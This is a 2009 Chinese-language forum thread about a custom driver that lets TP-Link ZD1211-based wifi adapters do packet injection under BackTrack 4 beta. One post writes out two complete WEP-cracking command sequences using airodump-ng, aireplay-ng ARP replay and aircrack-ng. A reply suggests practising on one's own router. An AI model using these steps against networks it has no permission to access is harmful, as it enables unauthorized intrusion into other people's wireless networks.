TL-WN322G+ for bt4-beta Driver(LZM)

wwelcome

WN322G+做了测试，还是不能注入，但可以发包，发现一个现象 就是发包的时候，PWR显示为0，也就是说和路由伪连接上了，但信号强为什么会是0，请LZ分析，注入不成功的原因 估计就是PWR为0
hswellsh 发表于 2009-3-23 22:53

0841的交互式攻击无法得到ARP包进行注入？还是得到了包注入后没反映？是拿自己的AP做的测试吗？AP信号不好就会出现这两种情况。
PWR为零我没太注意。

wwelcome

感谢楼主啊！我刚刚试了我的TL-WN422G可以用耶！！太高兴了 :lol
破解流程和楼主的一样，完全可以用 :victory:
wvihor 发表于 2009-3-23 22:58

TP官网上都没有你这产品，市场上也没见过，详细资料不详，刚查了下，也是ZD1211的，你没使用我制作的驱动前不能在BT4BETA下使用吗？

wvihor

TP官网上都没有你这产品，市场上也没见过，详细资料不详，刚查了下，也是ZD1211的，你没使用我制作的驱动前不能在BT4BETA下使用吗？
wwelcome 发表于 2009-3-23 23:19

对，之前是显示wlan0  ZYDAS1211  ZDR1211rW[pHY0]SICiFFLGS  NO  such drive的
TL-WN422G是TL-WN322G+的天线版

wwelcome

ＶＭ下测试成功的？

wvihor

40# wwelcome

对，用VM破解的

wwelcome

感谢你的测试！
睡了，晚安。

songjianchun

你们用的虚拟机是绿色版？

wwelcome

你们用的虚拟机是绿色版？
songjianchun 发表于 2009-3-24 09:50

VM官网下的正式版。

hyclt

感谢lz提供的lzm 我刚接触这个论坛 上个星期下了三个bt3的镜像(usb final vm)  由于条件有限，只有一块322G+的网卡，但是再楼主lzm的帮助下我成功得破解了有客户端的wep 接下来再试试无客户端的wep 希望能够好运～由于我做这个破解是用于毕业设计的，所以希望lz能够将破解的原理稍微和我说一下，或者发个链接给我让我看看，不胜感激！感觉菜鸟攻略中都是教你怎么使用工具，并没有将很多命令的原理说清楚。
另外我用了BackTrack使用全解_WEP破解篇V1 中的两种方法（非工具）一种是有客户端的方法 一种是无客户端的方法分别对有客户端的wep进行破解，都成功了，但是明显后面一个速度快，能说说原因吗？
方法一和方法二主要是命令上的不同
方法一的主要命令:
ifconfig ‐a
ifconfig ‐a rausb0 up
airmon‐ng start rausb0 6
airodump‐ng ‐w ciw.cap ‐‐channel 6 rausb0
aireplay‐ng ‐3 ‐b AP's MAC ‐h Client's MAC ‐x 1024 rausb0
aircrack‐ng ‐x ‐f 2 ciw.cap
方法二的主要命令：
步骤:
先打开个终端输入
kismet
利用s和c以及x可以控制 记下mac 和 ssid

再打开个终端输入
ifconfig -a
然后将wlan0起来
ifconfig -a wlan0 up
接着将网卡转变为检测模式
airodump-ng --ivs -w hyc -c 6 mon0  抓包的命令
你会看到有数据 等待data达到15000左右就可以破解了（15000是我自己估计的，一般到多少就能破解了？）
aircrack-ng -n 64 -b (ap mac) hyc-01.ivs(/home目录下)

请问为什么方法二要比方法一快许多 而且似乎方法二并没有注入的过程，反而比方法一快，谢谢!
我是新人 也许有很多基本原理不是很清楚。

wwelcome

1:首先,我做的是BT4BETA下的驱动。你的322G+在未使用我的驱动前能使用吗?这是我最关心的问题。
2:在未进行主动攻击前,获取IVS的多少和你无关,只和对方有关,数据通讯量大,获取的速度就快，得到的IVS就多。一般来说，攻击成功后会比被动获取IVS的速度快.关于为什么方法二要比方法一快许多,我就不太清楚了.学习这方面的知识,最好自己有一个路由器,以免走弯路。

wwelcome

关于破解的原理请潜水学习.在学习的过程中会有意外收获,因为在搜索的时候你会得到其他的相关知识。

songjianchun

mon开启了，就是如图不知何过，高手讲解，谢谢！在线等